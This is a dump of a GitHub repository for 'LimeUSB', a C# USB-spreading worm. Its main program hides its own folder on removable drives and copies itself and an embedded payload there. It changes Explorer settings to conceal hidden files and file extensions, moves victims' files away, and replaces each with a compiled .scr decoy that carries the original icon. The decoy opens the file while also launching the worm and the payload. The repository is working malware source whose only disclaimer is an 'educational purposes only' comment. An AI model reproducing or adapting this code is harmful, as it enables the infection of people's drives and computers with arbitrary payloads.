Repository: NYAN-x-CAT/LimeUSB-Csharp Branch: master Commit: 2219631df82f Files: 15 Total size: 42.5 KB Directory structure: gitextract_37kdbk3b/ ├── .gitattributes ├── .gitignore ├── LimeUSB-Csharp/ │ ├── FodyWeavers.xml │ ├── FodyWeavers.xsd │ ├── LimeUSB-Csharp.csproj │ ├── Program.cs │ ├── Properties/ │ │ ├── AssemblyInfo.cs │ │ ├── Resources.Designer.cs │ │ ├── Resources.resx │ │ ├── Settings.Designer.cs │ │ └── Settings.settings │ ├── Resources/ │ │ └── Source.cs │ └── packages.config ├── LimeUSB-Csharp.sln └── README.md ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ ############################################################################### # Set default behavior to automatically normalize line endings. ############################################################################### * text=auto ############################################################################### # Set default behavior for command prompt diff. # # This is need for earlier builds of msysgit that does not have it on by # default for csharp files. # Note: This is only used by command line ############################################################################### #*.cs diff=csharp ############################################################################### # Set the merge driver for project and solution files # # Merging from the command prompt will add diff markers to the files if there # are conflicts (Merging from VS is not affected by the settings below, in VS # the diff markers are never inserted). Diff markers may cause the following # file extensions to fail to load in VS. An alternative would be to treat # these files as binary and thus will always conflict and require user # intervention with every merge. To do so, just uncomment the entries below ############################################################################### #*.sln merge=binary #*.csproj merge=binary #*.vbproj merge=binary #*.vcxproj merge=binary #*.vcproj merge=binary #*.dbproj merge=binary #*.fsproj merge=binary #*.lsproj merge=binary #*.wixproj merge=binary #*.modelproj merge=binary #*.sqlproj merge=binary #*.wwaproj merge=binary ############################################################################### # behavior for image files # # image files are treated as binary by default. ############################################################################### #*.jpg binary #*.png binary #*.gif binary ############################################################################### # diff behavior for common document formats # # Convert binary document formats to text before diffing them. This feature # is only available from the command line. Turn it on by uncommenting the # entries below. ############################################################################### #*.doc diff=astextplain #*.DOC diff=astextplain #*.docx diff=astextplain #*.DOCX diff=astextplain #*.dot diff=astextplain #*.DOT diff=astextplain #*.pdf diff=astextplain #*.PDF diff=astextplain #*.rtf diff=astextplain #*.RTF diff=astextplain ================================================ FILE: .gitignore ================================================ ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. # User-specific files *.suo *.user *.userosscache *.sln.docstates # User-specific files (MonoDevelop/Xamarin Studio) *.userprefs # Build results [Dd]ebug/ [Dd]ebugPublic/ [Rr]elease/ [Rr]eleases/ x64/ x86/ bld/ [Bb]in/ [Oo]bj/ [Ll]og/ # Visual Studio 2015 cache/options directory .vs/ # Uncomment if you have tasks that create the project's static files in wwwroot #wwwroot/ # MSTest test Results [Tt]est[Rr]esult*/ [Bb]uild[Ll]og.* # NUNIT *.VisualState.xml TestResult.xml # Build Results of an ATL Project [Dd]ebugPS/ [Rr]eleasePS/ dlldata.c # DNX project.lock.json project.fragment.lock.json artifacts/ *_i.c *_p.c *_i.h *.ilk *.meta *.obj *.pch *.pdb *.pgc *.pgd *.rsp *.sbr *.tlb *.tli *.tlh *.tmp *.tmp_proj *.log *.vspscc *.vssscc .builds *.pidb *.svclog *.scc # Chutzpah Test files _Chutzpah* # Visual C++ cache files ipch/ *.aps *.ncb *.opendb *.opensdf *.sdf *.cachefile *.VC.db *.VC.VC.opendb # Visual Studio profiler *.psess *.vsp *.vspx *.sap # TFS 2012 Local Workspace $tf/ # Guidance Automation Toolkit *.gpState # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper *.DotSettings.user # JustCode is a .NET coding add-in .JustCode # TeamCity is a build add-in _TeamCity* # DotCover is a Code Coverage Tool *.dotCover # NCrunch _NCrunch_* .*crunch*.local.xml nCrunchTemp_* # MightyMoose *.mm.* AutoTest.Net/ # Web workbench (sass) .sass-cache/ # Installshield output folder [Ee]xpress/ # DocProject is a documentation generator add-in DocProject/buildhelp/ DocProject/Help/*.HxT DocProject/Help/*.HxC DocProject/Help/*.hhc DocProject/Help/*.hhk DocProject/Help/*.hhp DocProject/Help/Html2 DocProject/Help/html # Click-Once directory publish/ # Publish Web Output *.[Pp]ublish.xml *.azurePubxml # TODO: Comment the next line if you want to checkin your web deploy settings # but database connection strings (with potential passwords) will be unencrypted #*.pubxml *.publishproj # Microsoft Azure Web App publish settings. Comment the next line if you want to # checkin your Azure Web App publish settings, but sensitive information contained # in these scripts will be unencrypted PublishScripts/ # NuGet Packages *.nupkg # The packages folder can be ignored because of Package Restore **/packages/* # except build/, which is used as an MSBuild target. !**/packages/build/ # Uncomment if necessary however generally it will be regenerated when needed #!**/packages/repositories.config # NuGet v3's project.json files produces more ignoreable files *.nuget.props *.nuget.targets # Microsoft Azure Build Output csx/ *.build.csdef # Microsoft Azure Emulator ecf/ rcf/ # Windows Store app package directories and files AppPackages/ BundleArtifacts/ Package.StoreAssociation.xml _pkginfo.txt # Visual Studio cache files # files ending in .cache can be ignored *.[Cc]ache # but keep track of directories ending in .cache !*.[Cc]ache/ # Others ClientBin/ ~$* *~ *.dbmdl *.dbproj.schemaview *.jfm *.pfx *.publishsettings node_modules/ orleans.codegen.cs # Since there are multiple workflows, uncomment next line to ignore bower_components # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) #bower_components/ # RIA/Silverlight projects Generated_Code/ # Backup & report files from converting an old project file # to a newer Visual Studio version. Backup files are not needed, # because we have git ;-) _UpgradeReport_Files/ Backup*/ UpgradeLog*.XML UpgradeLog*.htm # SQL Server files *.mdf *.ldf # Business Intelligence projects *.rdl.data *.bim.layout *.bim_*.settings # Microsoft Fakes FakesAssemblies/ # GhostDoc plugin setting file *.GhostDoc.xml # Node.js Tools for Visual Studio .ntvs_analysis.dat # Visual Studio 6 build log *.plg # Visual Studio 6 workspace options file *.opt # Visual Studio LightSwitch build output **/*.HTMLClient/GeneratedArtifacts **/*.DesktopClient/GeneratedArtifacts **/*.DesktopClient/ModelManifest.xml **/*.Server/GeneratedArtifacts **/*.Server/ModelManifest.xml _Pvt_Extensions # Paket dependency manager .paket/paket.exe paket-files/ # FAKE - F# Make .fake/ # JetBrains Rider .idea/ *.sln.iml # CodeRush .cr/ # Python Tools for Visual Studio (PTVS) __pycache__/ *.pyc ================================================ FILE: LimeUSB-Csharp/FodyWeavers.xml ================================================  ================================================ FILE: LimeUSB-Csharp/FodyWeavers.xsd ================================================  A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. A list of unmanaged 32 bit assembly names to include, delimited with line breaks. A list of unmanaged 64 bit assembly names to include, delimited with line breaks. The order of preloaded assemblies, delimited with line breaks. This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. Controls if .pdbs for reference assemblies are also embedded. Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. A list of unmanaged 32 bit assembly names to include, delimited with |. A list of unmanaged 64 bit assembly names to include, delimited with |. The order of preloaded assemblies, delimited with |. 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. A comma-separated list of error codes that can be safely ignored in assembly verification. 'false' to turn off automatic generation of the XML Schema file. ================================================ FILE: LimeUSB-Csharp/LimeUSB-Csharp.csproj ================================================  Debug AnyCPU {94EA43AB-7878-4048-A64E-2B21B3B4366D} WinExe LimeUSB_Csharp LimeUSB-Csharp v4.0 512 true AnyCPU true pdbonly false bin\Debug\ DEBUG;TRACE prompt 4 AnyCPU none true bin\Release\ TRACE prompt 4 ..\packages\Costura.Fody.3.3.2\lib\net40\Costura.dll .\IconLib.dll ResXFileCodeGenerator Resources.Designer.cs Designer True Resources.resx True SettingsSingleFileGenerator Settings.Designer.cs True Settings.settings True This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. ================================================ FILE: LimeUSB-Csharp/Program.cs ================================================ using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Text; using System.Drawing.IconLib; using System.Windows.Forms; using Microsoft.Win32; using System.Drawing; using Microsoft.CSharp; using System.CodeDom.Compiler; using Microsoft.VisualBasic.Devices; // // │ Author : NYAN CAT // │ Name : LimeUSB v0.3.5 // Contact Me : https://github.com/NYAN-x-CAT // This program Is distributed for educational purposes only. // namespace LimeUSB_Csharp { class Program { public static void Main() { Initialize(); } public static void Initialize() { ExplorerOptions(); foreach (DriveInfo usb in DriveInfo.GetDrives()) { try { if (usb.DriveType == DriveType.Removable && usb.IsReady) { if (!Directory.Exists(usb.RootDirectory.ToString() + Settings.WorkDirectory)) { Directory.CreateDirectory(usb.RootDirectory.ToString() + Settings.WorkDirectory); File.SetAttributes(usb.RootDirectory.ToString() + Settings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden); } if (!Directory.Exists((usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.IconsDirectory))) Directory.CreateDirectory((usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.IconsDirectory)); if (!File.Exists(usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.LimeUSBFile)) File.Copy(Application.ExecutablePath, usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.LimeUSBFile); if (!File.Exists(usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.PayloadFile)) File.WriteAllBytes(usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.PayloadFile, Properties.Resources.Payload); CreteDirectory(usb.RootDirectory.ToString()); InfectFiles(usb.RootDirectory.ToString()); } } catch (Exception ex) { Debug.WriteLine("Initialize " + ex.Message); } } } public static void ExplorerOptions() { try { RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true); if (key.GetValue("Hidden") != (object)2) key.SetValue("Hidden", 2); if (key.GetValue("HideFileExt") != (object)1) key.SetValue("HideFileExt", 1); } catch (Exception ex) { Debug.WriteLine("ExplorerOptions: " + ex.Message); } } public static void InfectFiles(string path) { foreach (var file in Directory.GetFiles(path)) { try { if (CheckIfInfected(file)) { ChangeIcon(file); File.Move(file, file.Insert(3, Settings.WorkDirectory + "\\")); CompileFile(file); } } catch (Exception ex) { Debug.WriteLine("InfectFiles " + ex.Message); } } foreach (var directory in Directory.GetDirectories(path)) { if (!directory.Contains(Settings.WorkDirectory)) InfectFiles(directory); } } public static void CreteDirectory(string usbDirectory) { foreach (var directory in Directory.GetDirectories(usbDirectory)) { try { if (!directory.Contains(Settings.WorkDirectory)) { if (!Directory.Exists(directory.Insert(3, Settings.WorkDirectory + "\\"))) Directory.CreateDirectory(directory.Insert(3, Settings.WorkDirectory + "\\")); CreteDirectory(directory); } } catch (Exception ex) { Debug.WriteLine("CreteDirectory: " + ex.Message); } } } public static bool CheckIfInfected(string file) { try { FileVersionInfo info = FileVersionInfo.GetVersionInfo(file); if (info.LegalTrademarks == Settings.InfectedTrademark) return false; else return true; } catch { return false; } } public static void ChangeIcon(string file) { try { Icon fileIcon = Icon.ExtractAssociatedIcon(file); MultiIcon multiIcon = new MultiIcon(); SingleIcon singleIcon = multiIcon.Add(Path.GetFileName(file)); singleIcon.CreateFrom(fileIcon.ToBitmap(), IconOutputFormat.Vista); singleIcon.Save(Path.GetPathRoot(file) + Settings.WorkDirectory + "\\" + Settings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico"); } catch (Exception ex) { Debug.WriteLine("ChangeIcon: " + ex.Message); } } public static void CompileFile(string infectedFile) { try { string source = Properties.Resources.Source; source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + Settings.WorkDirectory + "\\" + Settings.PayloadFile); source = source.Replace("%File%", infectedFile.Insert(3, Settings.WorkDirectory + "\\")); source = source.Replace("%USB%", Path.GetPathRoot(infectedFile) + Settings.WorkDirectory + "\\" + Settings.LimeUSBFile); source = source.Replace("%Lime%", Settings.InfectedTrademark); source = source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12))); source = source.Replace("%Guid%", Guid.NewGuid().ToString()); string[] referencedAssemblies = new string[]{"System.dll"}; var providerOptions = new Dictionary() { {"CompilerVersion", "v4.0" } }; var compilerOptions = "/target:winexe /platform:anycpu /optimize+"; if (File.Exists(Path.GetPathRoot(infectedFile) + Settings.WorkDirectory + "\\" + Settings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico")) { compilerOptions += $" /win32icon:\"{Path.GetPathRoot(infectedFile) + Settings.WorkDirectory + "\\" + Settings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico"}\""; } using (var cSharpCodeProvider = new CSharpCodeProvider(providerOptions)) { var compilerParameters = new CompilerParameters(referencedAssemblies) { GenerateExecutable = true, OutputAssembly = infectedFile + ".scr", CompilerOptions = compilerOptions, TreatWarningsAsErrors = false, IncludeDebugInformation = false, }; var compilerResults = cSharpCodeProvider.CompileAssemblyFromSource(compilerParameters, source); //if (compilerResults.Errors.Count > 0) //{ // MessageBox.Show(string.Format("The compiler has encountered {0} errors", // compilerResults.Errors.Count), "Errors while compiling", MessageBoxButtons.OK, // MessageBoxIcon.Error); // foreach (CompilerError compilerError in compilerResults.Errors) // { // MessageBox.Show(string.Format("{0}\nLine: {1} - Column: {2}\nFile: {3}", compilerError.ErrorText, // compilerError.Line, compilerError.Column, compilerError.FileName), "Error", // MessageBoxButtons.OK, MessageBoxIcon.Error); // } //} } } catch (Exception ex) { Debug.WriteLine("CompileFile " + ex.Message); } } public static string Randomz(int L) { string validchars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; StringBuilder sb = new StringBuilder(); Random rand = new Random(); for (int i = 1; i <= L; i++) { int idx = rand.Next(0, validchars.Length); char randomChar = validchars[idx]; sb.Append(randomChar); } var randomString = sb.ToString(); return randomString; } } public class Settings { public static readonly string InfectedTrademark = "Trademark - Lime"; public static readonly string WorkDirectory = "$LimeUSB"; public static readonly string LimeUSBFile = "LimeUSB.exe"; public static readonly string PayloadFile = "Payload.exe"; public static readonly string IconsDirectory = "$LimeIcons"; } } ================================================ FILE: LimeUSB-Csharp/Properties/AssemblyInfo.cs ================================================ using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; // General Information about an assembly is controlled through the following // set of attributes. Change these attribute values to modify the information // associated with an assembly. [assembly: AssemblyTitle("LimeUSB-Csharp")] [assembly: AssemblyDescription("")] [assembly: AssemblyConfiguration("")] [assembly: AssemblyCompany("")] [assembly: AssemblyProduct("LimeUSB-Csharp")] [assembly: AssemblyCopyright("Copyright © 2019")] [assembly: AssemblyTrademark("")] [assembly: AssemblyCulture("")] // Setting ComVisible to false makes the types in this assembly not visible // to COM components. If you need to access a type in this assembly from // COM, set the ComVisible attribute to true on that type. [assembly: ComVisible(false)] // The following GUID is for the ID of the typelib if this project is exposed to COM [assembly: Guid("94ea43ab-7878-4048-a64e-2b21b3b4366d")] // Version information for an assembly consists of the following four values: // // Major Version // Minor Version // Build Number // Revision // // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] [assembly: AssemblyVersion("1.0.0.0")] [assembly: AssemblyFileVersion("1.0.0.0")] ================================================ FILE: LimeUSB-Csharp/Properties/Resources.Designer.cs ================================================ //------------------------------------------------------------------------------ // // This code was generated by a tool. // Runtime Version:4.0.30319.42000 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // //------------------------------------------------------------------------------ namespace LimeUSB_Csharp.Properties { using System; /// /// A strongly-typed resource class, for looking up localized strings, etc. /// // This class was auto-generated by the StronglyTypedResourceBuilder // class via a tool like ResGen or Visual Studio. // To add or remove a member, edit your .ResX file then rerun ResGen // with the /str option, or rebuild your VS project. [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")] [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] internal class Resources { private static global::System.Resources.ResourceManager resourceMan; private static global::System.Globalization.CultureInfo resourceCulture; [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] internal Resources() { } /// /// Returns the cached ResourceManager instance used by this class. /// [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] internal static global::System.Resources.ResourceManager ResourceManager { get { if (object.ReferenceEquals(resourceMan, null)) { global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("LimeUSB_Csharp.Properties.Resources", typeof(Resources).Assembly); resourceMan = temp; } return resourceMan; } } /// /// Overrides the current thread's CurrentUICulture property for all /// resource lookups using this strongly typed resource class. /// [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] internal static global::System.Globalization.CultureInfo Culture { get { return resourceCulture; } set { resourceCulture = value; } } /// /// Looks up a localized resource of type System.Byte[]. /// internal static byte[] Payload { get { object obj = ResourceManager.GetObject("Payload", resourceCulture); return ((byte[])(obj)); } } /// /// Looks up a localized string similar to using System; ///using System.Diagnostics; ///using System.Reflection; ///using System.Runtime.InteropServices; /// ///[assembly: AssemblyTrademark("%Lime%")] ///[assembly: Guid("%Guid%")] /// ///static class LimeUSBModule ///{ /// public static void Main() /// { /// try /// { /// System.Diagnostics.Process.Start(@"%File%"); /// System.Diagnostics.Process.Start(@"%USB%"); /// System.Diagnostics.Process.Start(@"%Payload%"); /// } /// catch /// { /// } /// } ///} ///. /// internal static string Source { get { return ResourceManager.GetString("Source", resourceCulture); } } } } ================================================ FILE: LimeUSB-Csharp/Properties/Resources.resx ================================================  text/microsoft-resx 2.0 System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ..\Resources\Payload.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ..\Resources\Source.cs;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 ================================================ FILE: LimeUSB-Csharp/Properties/Settings.Designer.cs ================================================ //------------------------------------------------------------------------------ // // This code was generated by a tool. // Runtime Version:4.0.30319.42000 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // //------------------------------------------------------------------------------ namespace LimeUSB_Csharp.Properties { [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); public static Settings Default { get { return defaultInstance; } } } } ================================================ FILE: LimeUSB-Csharp/Properties/Settings.settings ================================================  ================================================ FILE: LimeUSB-Csharp/Resources/Source.cs ================================================ using System; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; [assembly: AssemblyTrademark("%Lime%")] [assembly: Guid("%Guid%")] static class %LimeUSBModule% { public static void Main() { try { System.Diagnostics.Process.Start(@"%File%"); } catch { } try { System.Diagnostics.Process.Start(@"%USB%"); } catch { } try { System.Diagnostics.Process.Start(@"%Payload%"); } catch { } } } ================================================ FILE: LimeUSB-Csharp/packages.config ================================================  ================================================ FILE: LimeUSB-Csharp.sln ================================================  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 15 VisualStudioVersion = 15.0.28307.271 MinimumVisualStudioVersion = 10.0.40219.1 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LimeUSB-Csharp", "LimeUSB-Csharp\LimeUSB-Csharp.csproj", "{94EA43AB-7878-4048-A64E-2B21B3B4366D}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU Release|Any CPU = Release|Any CPU EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {94EA43AB-7878-4048-A64E-2B21B3B4366D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU {94EA43AB-7878-4048-A64E-2B21B3B4366D}.Debug|Any CPU.Build.0 = Debug|Any CPU {94EA43AB-7878-4048-A64E-2B21B3B4366D}.Release|Any CPU.ActiveCfg = Release|Any CPU {94EA43AB-7878-4048-A64E-2B21B3B4366D}.Release|Any CPU.Build.0 = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection GlobalSection(ExtensibilityGlobals) = postSolution SolutionGuid = {4750B11E-3F31-4B97-BB34-ED3AD5ABC922} EndGlobalSection EndGlobal ================================================ FILE: README.md ================================================ # LimeUSB ***Infect USB files*** ``` https://www.youtube.com/watch?v=ZRdYINVR1es ```